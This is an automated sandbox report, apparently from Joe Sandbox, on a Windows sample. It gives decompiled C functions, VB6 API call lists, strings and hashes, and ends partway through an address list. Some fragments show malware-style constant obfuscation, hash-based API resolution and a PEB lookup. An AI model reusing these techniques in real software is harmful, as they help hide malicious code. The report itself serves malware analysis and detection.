Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: UI$UI
API String ID: 0-658841096
Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction ID: 5218505178420fbce8b0df521429768d068e1618dc2bb2b6c1994a689ab5e469
Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction Fuzzy Hash: D931DEB5509341AFD394CE29C64A60FBBF0BB84B24F44C95DE4E9821A4D3788909DF43

Uniqueness

Uniqueness Score: -1.00%

Function 02CC1C70, Relevance: 1.4, Strings: 1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E02CC1C70(void* __ecx) {
				char _v4;
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t57;
				signed int _t58;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr* _t67;
				int _t73;
				void* _t78;
				signed int _t80;
				signed int _t91;
				void* _t110;
				void* _t114;
				void* _t115;
				signed int _t117;
				signed int* _t118;

				_t118 =  &_v12;
				_v8 = 0xac2a;
				_v8 = _v8 ^ 0xfb427452;
				_v8 = _v8 | 0x0433d0b5;
				_v8 = _v8 ^ 0xff73d8f5;
				_v12 = 0xb90d;
				_v12 = _v12 + 0xffffc883;
				_v12 = _v12 + 0xffff4556;
				_v12 = _v12 + 0xffff66fa;
				_v12 = _v12 + 0xffff302a;
				_v12 = _v12 + 0xffffad71;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0xe0b7b010;
				_t57 =  *0x2ccdd4c;
				_t114 = __ecx;
				if(_t57 == 0) {
					_t57 = E02CC3E80(_t78, E02CC3F20(0xbb398380), 0xae3c1a47, _t115);
					 *0x2ccdd4c = _t57;
				}
				_t58 =  *_t57();
				_v12 = 0x788;
				_v12 = _v12 >> 0xc;
				_t117 = _v8 + _t58 % _v12;
				_v12 = _v12 + 0xffff671b;
				_v12 = _v12 ^ 0x6acd08c3;
				_v12 = _v12 * 0x32;
				_v12 = _v12 + 0xffff2d32;
				_v12 = _v12 ^ 0x491450b8;
				_v12 = (_v12 - (0x29e4129f * _v12 >> 0x20) >> 1) + (0x29e4129f * _v12 >> 0x20) >> 6;
				_v12 = _v12 ^ 0x00f88eb6;
				_v8 = 0x2ce8;
				_v8 = _v8 + 0xffffe7d1;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 + 0x84e;
				_v8 = _v8 ^ 0x00061a91;
				_t64 =  *0x2ccdd4c;
				if(_t64 == 0) {
					_t64 = E02CC3E80(_t78, E02CC3F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x2ccdd4c = _t64;
				}
				_t65 =  *_t64();
				_t67 =  *0x2ccdd4c;
				_t80 = _v12 + _t65 % _v8;
				if(_t67 == 0) {
					_t67 = E02CC3E80(_t80, E02CC3F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x2ccdd4c = _t67;
				}
				_v4 =  *_t67();
				if(_t117 != 0) {
					_t110 = _t114;
					_t91 = _t117 >> 1;
					_t114 = _t114 + _t117 * 2;
					_t73 = memset(_t110, 0x2d002d, _t91 << 2);
					asm("adc ecx, ecx");
					memset(_t110 + _t91, _t73, 0);
					_t118 =  &(_t118[6]);
				}
				E02CC4ED0(_t114, _t80,  &_v4);
				 *((short*)(_t114 + _t80 * 2)) = 0;
				return 0;
			}

0x02cc1c70
0x02cc1c73
0x02cc1c7b
0x02cc1c83
0x02cc1c8b
0x02cc1c93
0x02cc1c9a
0x02cc1ca1
0x02cc1ca8
0x02cc1caf
0x02cc1cb6
0x02cc1cbd
0x02cc1cc1
0x02cc1cc8
0x02cc1cd0
0x02cc1cd4
0x02cc1ce7
0x02cc1cec
0x02cc1cec
0x02cc1cf1
0x02cc1cff
0x02cc1d07
0x02cc1d0c
0x02cc1d0e
0x02cc1d16
0x02cc1d23
0x02cc1d2c
0x02cc1d34
0x02cc1d4b
0x02cc1d4f
0x02cc1d57
0x02cc1d5f
0x02cc1d6c
0x02cc1d70
0x02cc1d78
0x02cc1d80
0x02cc1d87
0x02cc1d9a
0x02cc1d9f
0x02cc1d9f
0x02cc1da4
0x02cc1db2
0x02cc1db7
0x02cc1dbb
0x02cc1dce
0x02cc1dd3
0x02cc1dd3
0x02cc1dda
0x02cc1de0
0x02cc1de5
0x02cc1de7
0x02cc1de9
0x02cc1df1
0x02cc1df3
0x02cc1df5
0x02cc1df5
0x02cc1df8
0x02cc1e02
0x02cc1e0c
0x02cc1e16

Strings

,, xrefs: 02CC1D57

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: 2e59db191679d7796f149d7756107a914b7c602e3e144128dfcc20daf7f39488
Instruction ID: e2c43658643f2c71fad633fbdcd9b19612273973f1fd8d7f20217158fab0175c
Opcode Fuzzy Hash: 2e59db191679d7796f149d7756107a914b7c602e3e144128dfcc20daf7f39488
Instruction Fuzzy Hash: 50418B75A083429FC748EF79E41412EB7E2AFC0314F14CE2DE4D687250EB7899058F82

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4E20, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CC4E20() {

				return  *[fs:0x30];
			}

0x02cc4e26

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0045F290, Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,?), ref: 0045F2F5
__vbaBoolVarNull.MSVBVM60(0046C0E8), ref: 0045F300
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045F323
__vbaObjSet.MSVBVM60(?,?), ref: 0045F330

Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000148,?,00000000), ref: 00462569
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000128,?,00000000), ref: 00462596
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000014C,?,00000000), ref: 004625C0
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000012C,?,00000000), ref: 004625E0
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625F9
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625FC
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 0046260E
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462611
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462623
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462626
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462638

__vbaFreeObjList.MSVBVM60(00000002,?,?,?,0046C0C8,0046C0D8,0046C0F8,0046C108), ref: 0045F359
__vbaVarMove.MSVBVM60 ref: 0045F374
__vbaVarMove.MSVBVM60 ref: 0045F38C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409324,00000044), ref: 0045F3B9
__vbaStrMove.MSVBVM60 ref: 0045F3C8
__vbaStrCmp.MSVBVM60(cmPencil,?), ref: 0045F3DD
__vbaStrCmp.MSVBVM60(cmStar,?), ref: 0045F407
__vbaStrCmp.MSVBVM60(cmFillRgn,?), ref: 0045F431
__vbaHresultCheckObj.MSVBVM60(00000000,00401A08,004085D8,00000778), ref: 0045F823
__vbaFreeStr.MSVBVM60(0045F867), ref: 0045F857
__vbaFreeObj.MSVBVM60 ref: 0045F860

Strings

cmFillRgn, xrefs: 0045F42C
cmPencil, xrefs: 0045F3D8
cmInsertText, xrefs: 0045F566
cmDiagCross, xrefs: 0045F662
cmStar, xrefs: 0045F402
cmDiagLineLR, xrefs: 0045F60E
cmCircRect, xrefs: 0045F456
cmHorzLine, xrefs: 0045F590
cmDiagLineRL, xrefs: 0045F5E4
cmGetCol, xrefs: 0045F72F
cmBrush, xrefs: 0045F53C
cmStLine, xrefs: 0045F512
cmErase, xrefs: 0045F7FF
cmCross, xrefs: 0045F638
cmVertLine, xrefs: 0045F5BA
cmPolygon, xrefs: 0045F68C

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$NofreeVarg$FreeMove$AddrefBoolListNull
String ID: cmBrush$cmCircRect$cmCross$cmDiagCross$cmDiagLineLR$cmDiagLineRL$cmErase$cmFillRgn$cmGetCol$cmHorzLine$cmInsertText$cmPencil$cmPolygon$cmStLine$cmStar$cmVertLine
API String ID: 845036365-3004827106
Opcode ID: e9ec4f740f5c2809236c4d62bb4a7baf171fc66502a51eb36ab12a2c27332aa1
Instruction ID: 2a2e072d195cf0ba9da5fb6246f933cbce1b3786454a26b21deddbe021cd85b6
Opcode Fuzzy Hash: e9ec4f740f5c2809236c4d62bb4a7baf171fc66502a51eb36ab12a2c27332aa1
Instruction Fuzzy Hash: F1021070A013059BDB00DFA9C984AAEB7F5FF49305F24816EE809EB251D7399C468F99

Uniqueness

Uniqueness Score: -1.00%

Function 00463940, Relevance: 73.8, APIs: 40, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401E96), ref: 0046395E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401E96), ref: 0046398E
__vbaNew2.MSVBVM60(004095DC,0046C7C0,?,?,?,?,00401E96), ref: 004639AE
__vbaHresultCheckObj.MSVBVM60(00000000,?,004095CC,00000014), ref: 00463A14
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409CD0,00000068), ref: 00463A74
__vbaFreeObj.MSVBVM60 ref: 00463A9D
__vbaVarDup.MSVBVM60 ref: 00463AF2
__vbaVarDup.MSVBVM60 ref: 00463B0C
#595.MSVBVM60(?,00000010,?,0000000A,0000000A), ref: 00463B24
__vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,0000000A), ref: 00463B3C
#670.MSVBVM60(?), ref: 00463B65
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 00463B81
__vbaFreeVar.MSVBVM60 ref: 00463B91
__vbaNew2.MSVBVM60(00404C08,0046C1B8), ref: 00463BC0
__vbaChkstk.MSVBVM60 ref: 00463C11
__vbaChkstk.MSVBVM60 ref: 00463C3D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409B80,000002B0), ref: 00463C99
#670.MSVBVM60(?), ref: 00463CC1
__vbaStrVarMove.MSVBVM60(?), ref: 00463CCB
__vbaStrMove.MSVBVM60 ref: 00463CD6
__vbaFreeStr.MSVBVM60(?), ref: 00463CEF
__vbaFreeVar.MSVBVM60 ref: 00463CF8
#648.MSVBVM60(0000000A), ref: 00463D26
__vbaFreeVar.MSVBVM60 ref: 00463D33
#670.MSVBVM60(0000000A), ref: 00463D44
__vbaStrVarMove.MSVBVM60(0000000A), ref: 00463D4E
__vbaStrMove.MSVBVM60 ref: 00463D59
__vbaFileOpen.MSVBVM60(00002120,000000FF,?,00000000), ref: 00463D6C
__vbaFreeStr.MSVBVM60 ref: 00463D75
__vbaFreeVar.MSVBVM60 ref: 00463D7E
__vbaGet4.MSVBVM60(00000002,0046C0C2,00000001,?), ref: 00463D99
__vbaFileClose.MSVBVM60(?), ref: 00463DAB
#670.MSVBVM60(0000000A), ref: 00463DDA
__vbaStrVarMove.MSVBVM60(0000000A), ref: 00463DE4
__vbaStrMove.MSVBVM60 ref: 00463DF1
__vbaFreeVar.MSVBVM60 ref: 00463DFA
__vbaNew2.MSVBVM60(00404C08,0046C1B8), ref: 00463E1A
__vbaChkstk.MSVBVM60 ref: 00463E6B
__vbaChkstk.MSVBVM60 ref: 00463E97
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409B80,000002B0), ref: 00463EF3

Strings

Error, xrefs: 00463AD5
The App is already started!, xrefs: 00463AF8

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$Move$Chkstk$#670CheckHresult$New2$File$#595#648CloseErrorGet4ListOpen
String ID: Error$The App is already started!
API String ID: 4056323550-1790661043
Opcode ID: 414442f554ef38985f7c14e824e415547e48dfb3216a9e627a85a479a767b730
Instruction ID: 919731124e1fe9d5b27067eab5da1999b1b10ccba4e09ff9f59fd6397306a8bb
Opcode Fuzzy Hash: 414442f554ef38985f7c14e824e415547e48dfb3216a9e627a85a479a767b730
Instruction Fuzzy Hash: A0F138B4900259DFDB14DF90C988BDDBBB5FF08304F1081AAE509B72A1EB785A85CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00452440, Relevance: 71.0, APIs: 47, Instructions: 491
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00452440(void* __ebx, void* __edi, void* __esi, void* __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v116;
				signed int _v124;
				intOrPtr _v136;
				signed long long _v144;
				signed int _v148;
				signed int _t164;
				signed int _t169;
				signed int _t170;
				void* _t171;
				void* _t173;
				intOrPtr _t174;

				_t174 = _t173 - 0xc;
				 *[fs:0x0] = _t174;
				_v16 = _t174 - 0x7c;
				_v12 = 0x4014c8;
				_t169 = _a4;
				_v8 = _t169 & 0x00000001;
				_t170 = _t169 & 0xfffffffe;
				_a4 = _t170;
				 *((intOrPtr*)( *_t170 + 4))(_t170, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t171);
				_v60 = 0;
				_v76 = 0;
				_v96 = 0;
				E00461600(__ebx, 0, _t170);
				_t164 =  *0x46c070; // 0x0
				 *0x46c068 = 0;
				_v116 = _t164;
				while(1) {
					__eax =  *0x46c068; // 0x0
					__ecx = _v116;
					if(__eax > _v116) {
						break;
					}
					__ecx =  *0x46c074; // 0x0
					 *0x46c06c = 0;
					_v124 = __ecx;
					while(1) {
						__edx = _v124;
						__eax =  *0x46c06c; // 0x0
						if(__eax > _v124) {
							break;
						}
						__eax =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v60;
						__eax =  *__ebx( &_v60,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__eax =  *0x46c06c; // 0x0
						__ecx =  *0x46c068; // 0x0
						__edx = _v96;
						__eax = __eax - 1;
						__ecx = __ecx - 1;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __ecx, __eax);
						__eax = _v100;
						__ecx =  &_v60;
						_v52 = _v100;
						__eax =  *__edi();
						__ecx =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__edx =  &_v60;
						__eax =  *__ebx( &_v60, _v100);
						__ecx =  *__eax;
						__edx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__ecx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__edx =  *0x46c06c; // 0x0
						__eax =  *0x46c068; // 0x0
						__ecx = _v96;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __eax, __edx);
						__edx = _v100;
						__ecx =  &_v60;
						_v56 = _v100;
						 *__edi() =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v60;
						__eax =  *__ebx( &_v60,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__eax =  *0x46c06c; // 0x0
						__ecx =  *0x46c068; // 0x0
						__edx = _v96;
						__eax = __eax - 1;
						__ecx = __ecx + 1;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __ecx, __eax);
						__eax = _v100;
						__ecx =  &_v60;
						_v28 = _v100;
						__eax =  *__edi();
						__ecx =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__edx =  &_v60;
						__eax =  *__ebx( &_v60, _v100);
						__ecx =  *__eax;
						__edx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__ecx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__eax =  *0x46c068; // 0x0
						__edx =  *0x46c06c; // 0x0
						__ecx = _v96;
						__eax = __eax - 1;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __eax, __edx);
						__edx = _v100;
						__ecx =  &_v60;
						_v32 = _v100;
						 *__edi() =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v60;
						__eax =  *__ebx( &_v60,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__ecx =  *0x46c068; // 0x0
						__eax =  *0x46c06c; // 0x0
						__edx = _v96;
						__ecx = __ecx + 1;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __ecx, __eax);
						__eax = _v100;
						__ecx =  &_v60;
						_v36 = _v100;
						__eax =  *__edi();
						__ecx =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__edx =  &_v60;
						__eax =  *__ebx( &_v60, _v100);
						__ecx =  *__eax;
						__edx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__ecx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__edx =  *0x46c06c; // 0x0
						__eax =  *0x46c068; // 0x0
						__ecx = _v96;
						__edx = __edx + 1;
						__eax = __eax - 1;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __eax, __edx);
						__edx = _v100;
						__ecx =  &_v60;
						_v40 = _v100;
						 *__edi() =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v60;
						__eax =  *__ebx( &_v60,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__eax =  *0x46c06c; // 0x0
						__ecx =  *0x46c068; // 0x0
						__edx = _v96;
						__eax = __eax + 1;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __ecx, __eax);
						__eax = _v100;
						__ecx =  &_v60;
						_v44 = _v100;
						__eax =  *__edi();
						__ecx =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__edx =  &_v60;
						__eax =  *__ebx( &_v60, _v100);
						__ecx =  *__eax;
						__edx =  &_v96;
						_v104 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
						asm("fclex");
						if(__eax < 0) {
							__ecx = _v104;
							__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
						}
						__edx =  *0x46c06c; // 0x0
						__eax =  *0x46c068; // 0x0
						__ecx = _v96;
						__edx = __edx + 1;
						__eax = __eax + 1;
						E00408D5C();
						_v100 = __eax;
						__imp____vbaSetSystemError(_v96, __eax, __edx);
						__ecx =  &_v60;
						__eax =  *__edi();
						__edx = _v100;
						__eax = _v56;
						__ecx = _v52;
						__edx = _v100 + _v56;
						__eax = _v44;
						__edx = _v100 + _v56 + _v52;
						__ecx = _v40;
						__edx = _v100 + _v56 + _v52 + _v44;
						__eax = _v36;
						__edx = _v100 + _v56 + _v52 + _v44 + _v40;
						__ecx = _v32;
						__edx = _v100 + _v56 + _v52 + _v44 + _v40 + _v36;
						__eax = _v28;
						_v100 + _v56 + _v52 + _v44 + _v40 + _v36 + _v32 = _v100 + _v56 + _v52 + _v44 + _v40 + _v36 + _v32 + __eax;
						_v136 = _v100 + _v56 + _v52 + _v44 + _v40 + _v36 + _v32 + __eax;
						asm("fild dword [ebp-0x84]");
						_v144 = __fp0;
						__fp0 = _v144;
						if( *0x46c000 != 0) {
							_push( *0x4014c4);
							_push( *0x4014c0);
							L00401EB4();
						} else {
							__fp0 = __fp0 /  *0x4014c0;
						}
						asm("fnstsw ax");
						if((__al & 0x0000000d) != 0) {
							return __imp____vbaFPException();
						} else {
							__imp____vbaFpI4();
							 *0x46c084 = __eax;
							__ecx =  *__esi;
							__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
							__edx =  &_v60;
							__eax =  *__ebx( &_v60, __eax);
							__ecx =  *__eax;
							__edx =  &_v96;
							_v104 = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v96);
							asm("fclex");
							if(__eax < 0) {
								__ecx = _v104;
								__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0xe0);
							}
							__edx =  *0x46c084; // 0x0
							__eax =  *0x46c06c; // 0x0
							__ecx =  *0x46c068; // 0x0
							__edx = _v96;
							E00408D18();
							__imp____vbaSetSystemError(_v96, __ecx, __eax, __edx);
							__ecx =  &_v60;
							__eax =  *__edi();
							__ecx =  *0x46c06c; // 0x0
							__eax = 1;
							 *0x46c06c = __ecx;
							continue;
						}
					}
					__eax =  *0x46c068; // 0x0
					__ecx =  *0x46c070; // 0x0
					__esp = __esp - 0x10;
					__eax = __eax + __eax * 4;
					__eax = __eax + __eax * 4;
					__eax = __eax << 2;
					asm("cdq");
					__ecx = __ecx - 1;
					_t126 = __eax % __ecx;
					__eax = __eax / __ecx;
					__edx = _t126;
					__edx = __esp;
					_v148 = __eax;
					__eax = 4;
					asm("fild dword [ebp-0x90]");
					 *__edx = 4;
					__eax = _v72;
					_v68 = __fp0;
					__ecx = _v68;
					 *(__edx + 4) = _v72;
					__eax = _v64;
					 *(__edx + 8) = _v68;
					__ecx =  *__esi;
					 *((intOrPtr*)(__edx + 0xc)) = _v64;
					__eax =  *((intOrPtr*)( *__esi + 0x488))(__esi, 5);
					__edx =  &_v60;
					__eax =  *__ebx( &_v60, _v64);
					__imp____vbaLateIdSt(_v64);
					__ecx =  &_v60;
					__eax =  *__edi();
					__ecx =  *0x46c068; // 0x0
					__eax = 1;
					 *0x46c068 = __ecx;
				}
				__eax =  *__esi;
				__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
				__ecx =  &_v60;
				__eax =  *__ebx( &_v60,  *__esi);
				__edx =  *__eax;
				_v104 = __eax;
				__eax =  *((intOrPtr*)( *__eax + 0x264))(__eax);
				asm("fclex");
				if(__eax < 0) {
					__ecx = _v104;
					__imp____vbaHresultCheckObj(__eax, _v104, 0x40937c, 0x264);
				}
				__ecx =  &_v60;
				__eax =  *__edi();
				__esp = __esp - 0x10;
				__ecx = 4;
				__edx = __esp;
				__eax = 0;
				 *__edx = 4;
				__ecx = _v72;
				 *(__edx + 4) = _v72;
				__ecx =  *__esi;
				 *(__edx + 8) = 0;
				__eax = _v64;
				 *((intOrPtr*)(__edx + 0xc)) = _v64;
				__eax =  *((intOrPtr*)( *__esi + 0x488))(__esi, 5);
				__edx =  &_v60;
				__eax =  *__ebx( &_v60, _v64);
				__imp____vbaLateIdSt(_v64);
				__ecx =  &_v60;
				__eax =  *__edi();
				_v8 = 0;
				asm("wait");
				_push(0x452a08);
				return __eax;
			}

0x00452443
0x00452452
0x0045245f
0x00452462
0x00452469
0x00452471
0x00452474
0x00452478
0x0045247d
0x00452482
0x00452485
0x00452488
0x0045248b
0x00452490
0x0045249c
0x004524a8
0x004524ab
0x004524ab
0x004524b0
0x004524b5
0x00000000
0x00000000
0x004524bb
0x004524c1
0x004524cb
0x004524ce
0x004524ce
0x004524d1
0x004524d8
0x00000000
0x00000000
0x004524de
0x004524e1
0x004524e7
0x004524ec
0x004524ee
0x004524f0
0x004524f5
0x004524f8
0x00452500
0x00452502
0x00452504
0x00452513
0x00452513
0x00452519
0x0045251e
0x00452524
0x00452527
0x00452528
0x0045252c
0x00452531
0x00452534
0x0045253a
0x0045253d
0x00452540
0x00452543
0x00452545
0x00452548
0x0045254e
0x00452553
0x00452555
0x00452557
0x0045255c
0x0045255f
0x00452567
0x00452569
0x0045256b
0x0045257a
0x0045257a
0x00452580
0x00452586
0x0045258b
0x00452592
0x00452597
0x0045259a
0x004525a0
0x004525a3
0x004525a6
0x004525ab
0x004525ae
0x004525b4
0x004525b9
0x004525bb
0x004525bd
0x004525c2
0x004525c5
0x004525cd
0x004525cf
0x004525d1
0x004525e0
0x004525e0
0x004525e6
0x004525eb
0x004525f1
0x004525f4
0x004525f5
0x004525f9
0x004525fe
0x00452601
0x00452607
0x0045260a
0x0045260d
0x00452610
0x00452612
0x00452615
0x0045261b
0x00452620
0x00452622
0x00452624
0x00452629
0x0045262c
0x00452634
0x00452636
0x00452638
0x00452647
0x00452647
0x0045264d
0x00452652
0x00452658
0x0045265b
0x0045265f
0x00452664
0x00452667
0x0045266d
0x00452670
0x00452673
0x00452678
0x0045267b
0x00452681
0x00452686
0x00452688
0x0045268a
0x0045268f
0x00452692
0x0045269a
0x0045269c
0x0045269e
0x004526ad
0x004526ad
0x004526b3
0x004526b9
0x004526be
0x004526c1
0x004526c5
0x004526ca
0x004526cd
0x004526d3
0x004526d6
0x004526d9
0x004526dc
0x004526de
0x004526e1
0x004526e7
0x004526ec
0x004526ee
0x004526f0
0x004526f5
